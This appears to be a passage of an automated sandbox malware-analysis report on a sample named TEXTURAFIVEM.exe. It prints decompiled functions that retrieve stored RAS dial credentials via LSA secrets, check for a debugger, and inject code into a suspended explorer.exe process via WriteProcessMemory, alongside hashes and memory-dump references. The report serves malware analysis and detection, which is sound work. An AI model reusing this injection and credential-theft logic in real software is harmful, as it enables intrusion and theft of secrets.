                                    0x00407ecc
                                    0x00407ed7
                                    0x00407ed8
                                    0x00407ed8
                                    0x00407edf
                                    0x00407ee2
                                    0x00407ee5
                                    0x00407ef7

                                    APIs
                                      • Part of subcall function 00407CAC: GetUserNameA.ADVAPI32(00000000,000000FF), ref: 00407CF3
                                      • Part of subcall function 00407CAC: LookupAccountNameA.ADVAPI32(00000000,00000000,?,000000FF,?,000000FF,?), ref: 00407D2F
                                      • Part of subcall function 00407CAC: IsValidSid.ADVAPI32(?,00000000,000000FF,00000000,00407D81), ref: 00407D3F
                                      • Part of subcall function 00407CAC: ConvertSidToStringSidA.ADVAPI32(?,?), ref: 00407D53
                                      • Part of subcall function 00407CAC: GlobalFree.KERNEL32(?), ref: 00407D66
                                      • Part of subcall function 00407DD0: LsaOpenPolicy.ADVAPI32(00000000,?,00000004), ref: 00407DF8
                                      • Part of subcall function 00407DD0: LsaRetrievePrivateData.ADVAPI32(?,?,?), ref: 00407E17
                                      • Part of subcall function 00407DD0: LsaClose.ADVAPI32(00000000), ref: 00407E2E
                                    • LsaFreeMemory.ADVAPI32(?), ref: 00407EA5
                                    • LsaFreeMemory.ADVAPI32(?), ref: 00407ED8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Free$MemoryName$AccountCloseConvertDataGlobalLookupOpenPolicyPrivateRetrieveStringUserValid
                                    • String ID: L$_RasDefaultCredentials#0$RasDialParams!
                                    • API String ID: 3536555734-4131767963
                                    • Opcode ID: 7244b0321237c455948edbdb93282e145ed4da0237b3fe86ec9488f9e6135b81
                                    • Instruction ID: 051c29abe3561fe595ca9589d677eda25b311890e2a2b38154f2da2c0a53b43f
                                    • Opcode Fuzzy Hash: 7244b0321237c455948edbdb93282e145ed4da0237b3fe86ec9488f9e6135b81
                                    • Instruction Fuzzy Hash: 8911C934A08248AFDB00DB95C942F9DB7F5EB48704F6084F6F900A77D2D638BE05DA5A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00405AD8, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28libraryloaderCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 58%
                                    			E00405AD8(void* __eax, void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				_Unknown_base(*)()* _t6;
				void* _t8;
				void* _t14;
				void* _t15;

				_t14 = __ecx;
				_t15 = __edx;
				_t8 = __eax;
				_t6 = GetProcAddress(LoadLibraryA("shell32.dll"), "ShellExecuteA");
				return  *_t6(_t8, _t15, _t14, _a12, _a8, _a4);
			}







                                    0x00405ade
                                    0x00405ae0
                                    0x00405ae2
                                    0x00405af4
                                    0x00405b0e

                                    APIs
                                    • LoadLibraryA.KERNEL32(shell32.dll,ShellExecuteA), ref: 00405AEE
                                    • GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00405AF4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: ShellExecuteA$shell32.dll
                                    • API String ID: 2574300362-4013357483
                                    • Opcode ID: 70672a5890152c1e78ef8b0d6a8ba5b8b829c768844e900c89825be7bf6273f8
                                    • Instruction ID: f0fdb292883bcfe093ec2198a563b102d7430bdd074e61d60e743b8a46e47796
                                    • Opcode Fuzzy Hash: 70672a5890152c1e78ef8b0d6a8ba5b8b829c768844e900c89825be7bf6273f8
                                    • Instruction Fuzzy Hash: 70E086723006143B9710EEDB9C41C9BBBACDEC9B64310C53BB508972519475AD0186F8
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040562C, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 25libraryloaderCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 58%
                                    			E0040562C() {
				void* _t5;
				struct HINSTANCE__* _t6;
				intOrPtr* _t7;
				intOrPtr* _t8;

				_t5 = 0;
				_t6 = LoadLibraryA("kernel32.dll");
				if(_t6 != 0) {
					_t8 = GetProcAddress(_t6, "IsDebuggerPresent");
					_t7 = _t8;
					if(_t8 != 0) {
						_t5 =  *_t7();
					}
				}
				return _t5;
			}







                                    0x00405630
                                    0x0040563c
                                    0x00405640
                                    0x0040564d
                                    0x0040564f
                                    0x00405653
                                    0x00405657
                                    0x00405657
                                    0x00405653
                                    0x0040565f

                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?,?,00000000,004056C8,00000000,0040B22C,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4), ref: 00405637
                                    • GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 00405648
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: IsDebuggerPresent$kernel32.dll
                                    • API String ID: 2574300362-2078679533
                                    • Opcode ID: 0f2c0815cd8c1a43d894b1d06190de4a79993326b8e6ff8f207f4119a9c4f690
                                    • Instruction ID: 709391d187db73d1dcda7b1af944ced4f983b45a8e89d04e37376b255e5d8423
                                    • Opcode Fuzzy Hash: 0f2c0815cd8c1a43d894b1d06190de4a79993326b8e6ff8f207f4119a9c4f690
                                    • Instruction Fuzzy Hash: 4AD0121634561C2982313CE91C85F275A4CC5C5665799093BB508A2381DDAB4C0559A8
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00405E60, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 58%
                                    			E00405E60(void* __eax, void* __edx) {
				_Unknown_base(*)()* _t3;
				void* _t5;
				void* _t7;

				_t7 = __edx;
				_t5 = __eax;
				_t3 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GetWindowsDirectoryA");
				return  *_t3(_t5, _t7);
			}






                                    0x00405e62
                                    0x00405e64
                                    0x00405e76
                                    0x00405e81

                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,GetWindowsDirectoryA,?,?,00405FAE,00000000,00405FEF), ref: 00405E70
                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00405E76
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: GetWindowsDirectoryA$kernel32.dll
                                    • API String ID: 2574300362-157430550
                                    • Opcode ID: eaea27decea16d5132e662f6b3d6d1e327edaddf7cadff529396c82a7d7f61a7
                                    • Instruction ID: 4b7778617931093bb27523e6f2e67fe50c24fa97b8e3c3713106166120904923
                                    • Opcode Fuzzy Hash: eaea27decea16d5132e662f6b3d6d1e327edaddf7cadff529396c82a7d7f61a7
                                    • Instruction Fuzzy Hash: F7C08CB120162039D9203AF60C82EAB094CCC8426A32008337408F22C284BE0E0000FC
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00405E18, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 58%
                                    			E00405E18(void* __eax, void* __edx) {
				_Unknown_base(*)()* _t3;
				void* _t5;
				void* _t7;

				_t7 = __edx;
				_t5 = __eax;
				_t3 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GetSystemDirectoryA");
				return  *_t3(_t5, _t7);
			}






                                    0x00405e1a
                                    0x00405e1c
                                    0x00405e2e
                                    0x00405e39

                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,GetSystemDirectoryA,?,?,00405F22,00000000,00405F63), ref: 00405E28
                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00405E2E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: GetSystemDirectoryA$kernel32.dll
                                    • API String ID: 2574300362-261809815
                                    • Opcode ID: 47b9e16137c7ae96d6a2bc759c8bd7e7168d98e07d0b0e8878cbeb5beabce437
                                    • Instruction ID: c580b32cc06898864e96a6d997c1f25460584718cb9bf05ade4b506b0c3faeb4
                                    • Opcode Fuzzy Hash: 47b9e16137c7ae96d6a2bc759c8bd7e7168d98e07d0b0e8878cbeb5beabce437
                                    • Instruction Fuzzy Hash: 0AC08CB120162035EA203AF60C8AE9B094CCC8466632008337018F22C384BE4E0000FC
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00405EAC, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 58%
                                    			E00405EAC(void* __eax, void* __edx) {
				_Unknown_base(*)()* _t3;
				void* _t5;
				void* _t7;

				_t7 = __edx;
				_t5 = __eax;
				_t3 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GetTempPathA");
				return  *_t3(_t5, _t7);
			}






                                    0x00405eae
                                    0x00405eb0
                                    0x00405ec2
                                    0x00405ecd

                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,GetTempPathA,?,?,0040601D,?,00409E30,00000000,?,?,?,?,?,00000000,00000000,00000000), ref: 00405EBC
                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00405EC2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: GetTempPathA$kernel32.dll
                                    • API String ID: 2574300362-3269217876
                                    • Opcode ID: ae85f7ca30a4ebc3f898838e590f98755c29af6d739c50bb3d1863989f8de6f9
                                    • Instruction ID: ddb0b176c331170ea1d21e324cbd039c108f0085b782601a862f0faf436c2439
                                    • Opcode Fuzzy Hash: ae85f7ca30a4ebc3f898838e590f98755c29af6d739c50bb3d1863989f8de6f9
                                    • Instruction Fuzzy Hash: CCC08CB121162035E5207AF60C8AE97084CCC842A632408337004F22C294BE1E0000FC
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 240E0950, Relevance: 6.2, APIs: 4, Instructions: 205librarymemoryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryA.KERNEL32(?), ref: 240E0A9A
                                    • GetProcAddress.KERNEL32(?,240DBFF9), ref: 240E0AAF
                                    • VirtualProtect.KERNEL32(24080000,00001000,00000004,?,00000000), ref: 240E0B0E
                                    • VirtualProtect.KERNEL32(24080000,00001000), ref: 240E0B23
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.530063938.00000000240C4000.00000040.00000001.sdmp, Offset: 24080000, based on PE: true
                                    • Associated: 00000001.00000002.530051983.0000000024080000.00000002.00000001.sdmp Download File
                                    • Associated: 00000001.00000002.530090141.00000000240E1000.00000004.00000001.sdmp Download File
                                    Similarity
                                    • API ID: ProtectVirtual$AddressLibraryLoadProc
                                    • String ID:
                                    • API String ID: 3300690313-0
                                    • Opcode ID: 7dbe02cfd99deeae501bb7ce8f16126b433c42ac1db0b9e8f635e1b0f97df296
                                    • Instruction ID: 859a6ed9444aeda8c6e9f8ee2a95361078bb8b241cbcef16e255fdfb840684b4
                                    • Opcode Fuzzy Hash: 7dbe02cfd99deeae501bb7ce8f16126b433c42ac1db0b9e8f635e1b0f97df296
                                    • Instruction Fuzzy Hash: 5351F8727553264EE3118D788CC0E757BD0EB42224B1C0778CFE9C73C6E7A455959B51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004058E0, Relevance: 6.0, APIs: 4, Instructions: 25windowsleepCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E004058E0(struct tagMSG* __eax) {
				long _t7;
				MSG* _t8;

				_t8 = __eax;
				_t7 = 0;
				if(PeekMessageA(__eax, 0, 0, 0, 1) != 0) {
					_t7 = 1;
					if(_t8->message != 0x12) {
						TranslateMessage(_t8);
						DispatchMessageA(_t8);
					}
				}
				Sleep(1);
				return _t7;
			}





                                    0x004058e2
                                    0x004058e4
                                    0x004058f6
                                    0x004058f8
                                    0x004058fe
                                    0x00405901
                                    0x00405907
                                    0x00405907
                                    0x004058fe
                                    0x0040590e
                                    0x00405917

                                    APIs
                                    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 004058EF
                                    • TranslateMessage.USER32 ref: 00405901
                                    • DispatchMessageA.USER32 ref: 00405907
                                    • Sleep.KERNEL32(00000001,?,00000000,00405922), ref: 0040590E
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Message$DispatchPeekSleepTranslate
                                    • String ID:
                                    • API String ID: 3768732053-0
                                    • Opcode ID: d6ab4591d5ae237bab473a8afd9d438f801d83b33db59c6d5a5b392af26336c7
                                    • Instruction ID: 6e183c8d27a73f5ab686f93293f9443bc1ab9610ab5d407b35826ec629df393a
                                    • Opcode Fuzzy Hash: d6ab4591d5ae237bab473a8afd9d438f801d83b33db59c6d5a5b392af26336c7
                                    • Instruction Fuzzy Hash: B9E012B13836147DF63079650C83F9F594C8F02B9AF54453BF201BB2C2C5AA5E0041AD
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040BA84, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 19COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E0040BA84(void* __eflags) {
				void* _t7;

				_t7 = E00403568(0, 0, "_x_X_BLOCKMOUSE_X_x_");
				if(GetLastError() != 0xb7) {
					CloseHandle(_t7);
					return 1;
				} else {
					CloseHandle(_t7);
					return 0;
				}
			}




                                    0x0040ba93
                                    0x0040ba9f
                                    0x0040baac
                                    0x0040bab4
                                    0x0040baa1
                                    0x0040baa2
                                    0x0040baaa
                                    0x0040baaa

                                    APIs
                                      • Part of subcall function 00403568: CreateMutexA.KERNEL32(?,?,?,?,?), ref: 0040357E
                                    • GetLastError.KERNEL32(00000000,0040BEF8,0000000E,Function_0000B108,00400000,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BA95
                                    • CloseHandle.KERNEL32(00000000,00000000,0040BEF8,0000000E,Function_0000B108,00400000,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BAA2
                                    • CloseHandle.KERNEL32(00000000,00000000,0040BEF8,0000000E,Function_0000B108,00400000,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BAAC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHandle$CreateErrorLastMutex
                                    • String ID: _x_X_BLOCKMOUSE_X_x_
                                    • API String ID: 2372642624-2341447584
                                    • Opcode ID: 1a8c2dc209660b13ed4db7da09b804a36426b86662114a7581cc9a960c290bce
                                    • Instruction ID: d02ee9e762f20a6f0fe939e11bc02ca9e1bd7b756de2d39ced16b1d78259e861
                                    • Opcode Fuzzy Hash: 1a8c2dc209660b13ed4db7da09b804a36426b86662114a7581cc9a960c290bce
                                    • Instruction Fuzzy Hash: 97D0C9A174534035E910B9B51CC3B0E050C875071BFA01837B104BA1D3D67D8601262D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Analysis Process: TEXTURAFIVEM.exe PID: 6984 Parent PID: 3440 TEXTURAFIVEM.exeCOMMON

                                    Executed Functions

                                    Function 0040B3C0, Relevance: 30.1, APIs: 11, Strings: 6, Instructions: 304processthreadCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 91%
                                    			E0040B3C0(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				long _v8;
				char _v12;
				struct _PROCESS_INFORMATION _v28;
				struct _STARTUPINFOA _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				intOrPtr _t58;
				intOrPtr* _t60;
				intOrPtr* _t61;
				char* _t62;
				intOrPtr* _t71;
				intOrPtr _t91;
				intOrPtr* _t99;
				void* _t104;
				intOrPtr* _t113;
				intOrPtr* _t119;
				intOrPtr* _t124;
				intOrPtr _t129;
				intOrPtr* _t137;
				void* _t142;
				intOrPtr* _t151;
				intOrPtr _t159;
				char* _t161;
				struct HWND__* _t163;
				void* _t168;
				intOrPtr _t197;
				intOrPtr _t201;
				intOrPtr _t210;
				intOrPtr _t221;
				void* _t236;
				void* _t239;
				void* _t241;

				_t234 = __edi;
				_t194 = __ecx;
				_t185 = __ebx;
				_push(__ebx);
				_push(__esi);
				_v116 = 0;
				_v112 = 0;
				_v108 = 0;
				_v104 = 0;
				_v100 = 0;
				_push(_t239);
				_push(0x40b7a8);
				_push( *[fs:eax]);
				 *[fs:eax] = _t239 + 0xffffff90;
				_t58 =  *0x40d1cc; // 0x40e924
				_t236 = E00401F9C(_t58);
				_t60 =  *0x40d210; // 0x40e8ec
				_t241 =  *_t60 - 2;
				if(_t241 != 0) {
					_t61 =  *0x40d210; // 0x40e8ec
					__eflags =  *_t61 - 1;
					if(__eflags != 0) {
						_t62 =  *0x40d1b8; // 0x40e8fc
						__eflags =  *_t62 - 1;
						if( *_t62 == 1) {
							__eflags = 0;
							E004013A4(0,  &_v116);
							E00401E94( *0x40f1e8, _v116);
							if(__eflags != 0) {
								_t194 = E00401F48( *0x40f1e8);
								__eflags = 0;
								E00405AD8(0, _t85, "open", 0, 0x40b7f0, 0x40b7f0);
								E0040AFB0(__ebx, _t85, _t236, 0);
								ExitProcess(0);
							}
						}
						_t197 =  *0x40d21c; // 0x40e8f0
						__eflags = 0;
						E004013A4(0, _t197);
						E00403738();
						E00403738();
						_t71 =  *0x40d21c; // 0x40e8f0
						CreateProcessA(E00401F48( *_t71), 0x40b7f0, 0, 0, 0, 4, 0, 0,  &_v96,  &_v28);
						E004040F4(_v28.hProcess, _v28.hProcess, _t194, _t236, _t234, _t236);
					} else {
						E00406294( &_v112, __ebx, __edi, _t236, __eflags);
						_t91 =  *0x40d21c; // 0x40e8f0
						E00401B14(_t91, _v112);
						E00403738();
						E00403738();
						_t99 =  *0x40d21c; // 0x40e8f0
						CreateProcessA(E00401F48( *_t99), 0x40b7f0, 0, 0, 0, 4, 0, 0,  &_v96,  &_v28);
						_t104 = E004040F4(_v28.hProcess, _v28.hProcess, _t194, _t236, __edi, _t236);
						__eflags = _t104;
						if(_t104 == 0) {
							_t210 =  *0x40d21c; // 0x40e8f0
							E004013A4(0, _t210);
							E00403738();
							E00403738();
							_t113 =  *0x40d21c; // 0x40e8f0
							CreateProcessA(E00401F48( *_t113), 0x40b7f0, 0, 0, 0, 4, 0, 0,  &_v96,  &_v28);
							E004040F4(_v28.hProcess, _v28.hProcess, _t194, _t236, __edi, _t236);
						}
					}
				} else {
					_t119 =  *0x40d21c; // 0x40e8f0
					E004047C4( *_t119, __ebx,  &_v100, __edi, _t236, _t241);
					E00401E94(_v100, "explorer.exe");
					if(_t241 != 0) {
						_t124 =  *0x40d21c; // 0x40e8f0
						__eflags = E004064DC( *_t124, __ebx,  &_v12, __edi, _t236, __eflags) - 1;
						if(__eflags != 0) {
							E00406294( &_v108, _t185, __edi, _t236, __eflags);
							_t129 =  *0x40d21c; // 0x40e8f0
							E00401B14(_t129, _v108);
						} else {
							E004063FC(_v12,  &_v104);
							_t159 =  *0x40d21c; // 0x40e8f0
							E00401B14(_t159, _v104);
						}
						E00403738();
						E00403738();
						_t137 =  *0x40d21c; // 0x40e8f0
						CreateProcessA(E00401F48( *_t137), 0x40b7f0, 0, 0, 0, 4, 0, 0,  &_v96,  &_v28);
						_t142 = E004040F4(_v28.hProcess, _v28.hProcess, _t194, _t236, _t234, _t236);
					} else {
						_t161 =  *0x40d214; // 0x40e8f4
						if( *_t161 != 1) {
							_t163 = FindWindowA("shell_traywnd", 0); // executed
							GetWindowThreadProcessId(_t163,  &_v8);
							_t168 = E004040F4(OpenProcess(0x1f0fff, 0, _v8), _t166, _t194, _t236, __edi, _t236); // executed
							__eflags = _t168;
							if(_t168 != 0) {
								_t142 = 1;
							} else {
								E00403738();
								E00403738();
								CreateProcessA(0, "explorer.exe", 0, 0, 0, 4, 0, 0,  &_v96,  &_v28); // executed
								_t142 = E004040F4(_v28.hProcess, _v28.hProcess, _t194, _t236, __edi, _t236); // executed
							}
						} else {
							E00403738();
							E00403738();
							CreateProcessA(0, "explorer.exe", 0, 0, 0, 4, 0, 0,  &_v96,  &_v28);
							_t142 = E004040F4(_v28.hProcess, _v28.hProcess, _t194, _t236, __edi, _t236);
						}
					}
					if(_t142 == 0) {
						_t221 =  *0x40d21c; // 0x40e8f0
						E004013A4(0, _t221);
						E00403738();
						E00403738();
						_t151 =  *0x40d21c; // 0x40e8f0
						CreateProcessA(E00401F48( *_t151), 0x40b7f0, 0, 0, 0, 4, 0, 0,  &_v96,  &_v28);
						E004040F4(_v28.hProcess, _v28.hProcess, _t194, _t236, _t234, _t236);
					}
				}
				_pop(_t201);
				 *[fs:eax] = _t201;
				_push(E0040B7AF);
				return E00401AE4( &_v116, 5);
			}






































                                    0x0040b3c0
                                    0x0040b3c0
                                    0x0040b3c0
                                    0x0040b3c6
                                    0x0040b3c7
                                    0x0040b3ca
                                    0x0040b3cd
                                    0x0040b3d0
                                    0x0040b3d3
                                    0x0040b3d6
                                    0x0040b3db
                                    0x0040b3dc
                                    0x0040b3e1
                                    0x0040b3e4
                                    0x0040b3e7
                                    0x0040b3f1
                                    0x0040b3f3
                                    0x0040b3f8
                                    0x0040b3fb
                                    0x0040b5fd
                                    0x0040b602
                                    0x0040b605
                                    0x0040b6dc
                                    0x0040b6e1
                                    0x0040b6e4
                                    0x0040b6e9
                                    0x0040b6eb
                                    0x0040b6f8
                                    0x0040b6fd
                                    0x0040b715
                                    0x0040b71c
                                    0x0040b71e
                                    0x0040b723
                                    0x0040b72a
                                    0x0040b72a
                                    0x0040b6fd
                                    0x0040b72f
                                    0x0040b735
                                    0x0040b737
                                    0x0040b744
                                    0x0040b751
                                    0x0040b76f
                                    0x0040b77c
                                    0x0040b788
                                    0x0040b60b
                                    0x0040b60e
                                    0x0040b616
                                    0x0040b61b
                                    0x0040b628
                                    0x0040b635
                                    0x0040b653
                                    0x0040b660
                                    0x0040b66c
                                    0x0040b671
                                    0x0040b673
                                    0x0040b679
                                    0x0040b681
                                    0x0040b68e
                                    0x0040b69b
                                    0x0040b6b9
                                    0x0040b6c6
                                    0x0040b6d2
                                    0x0040b6d2
                                    0x0040b673
                                    0x0040b401
                                    0x0040b404
                                    0x0040b40b
                                    0x0040b418
                                    0x0040b41d
                                    0x0040b502
                                    0x0040b50e
                                    0x0040b510
                                    0x0040b52f
                                    0x0040b537
                                    0x0040b53c
                                    0x0040b512
                                    0x0040b518
                                    0x0040b520
                                    0x0040b525
                                    0x0040b525
                                    0x0040b549
                                    0x0040b556
                                    0x0040b574
                                    0x0040b581
                                    0x0040b58d
                                    0x0040b423
                                    0x0040b423
                                    0x0040b42b
                                    0x0040b483
                                    0x0040b489
                                    0x0040b4a4
                                    0x0040b4a9
                                    0x0040b4ab
                                    0x0040b4f8
                                    0x0040b4ad
                                    0x0040b4b5
                                    0x0040b4c2
                                    0x0040b4e2
                                    0x0040b4ee
                                    0x0040b4ee
                                    0x0040b42d
                                    0x0040b435
                                    0x0040b442
                                    0x0040b462
                                    0x0040b46e
                                    0x0040b46e
                                    0x0040b42b
                                    0x0040b594
                                    0x0040b59a
                                    0x0040b5a2
                                    0x0040b5af
                                    0x0040b5bc
                                    0x0040b5da
                                    0x0040b5e7
                                    0x0040b5f3
                                    0x0040b5f3
                                    0x0040b594
                                    0x0040b78f
                                    0x0040b792
                                    0x0040b795
                                    0x0040b7a7

                                    APIs
                                    • CreateProcessA.KERNEL32(00000000,explorer.exe,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000000,0040B7A8), ref: 0040B462
                                      • Part of subcall function 004040F4: VirtualAlloc.KERNEL32(?,?,00003000,00000040), ref: 00404159
                                      • Part of subcall function 004040F4: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00003000,00000040), ref: 0040416C
                                      • Part of subcall function 004040F4: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,00000000,00000000,00008000,?,?,00003000,00000040), ref: 00404186
                                      • Part of subcall function 004040F4: WriteProcessMemory.KERNEL32(?,00000000,?,?,?,?,?,?,00003000,00000040), ref: 004041C8
                                    • FindWindowA.USER32(shell_traywnd,00000000), ref: 0040B483
                                    • GetWindowThreadProcessId.USER32(00000000,shell_traywnd), ref: 0040B489
                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,00000000,shell_traywnd,00000000,?,00000000,0040B7A8), ref: 0040B499
                                    • CreateProcessA.KERNEL32(00000000,explorer.exe,00000000,00000000,00000000,00000004,00000000,00000000,?,?,001F0FFF,00000000,?,00000000,shell_traywnd,00000000), ref: 0040B4E2
                                    • CreateProcessA.KERNEL32(00000000,0040B7F0,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000000,0040B7A8), ref: 0040B581
                                    • CreateProcessA.KERNEL32(00000000,0040B7F0,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000000,0040B7F0,00000000,00000000,00000000,00000004), ref: 0040B5E7
                                    • CreateProcessA.KERNEL32(00000000,0040B7F0,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000000,0040B7A8), ref: 0040B660
                                    • CreateProcessA.KERNEL32(00000000,0040B7F0,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000000,0040B7F0,00000000,00000000,00000000,00000004), ref: 0040B6C6
                                      • Part of subcall function 004047C4: CharLowerA.USER32(?,00000000,00404839), ref: 00404802
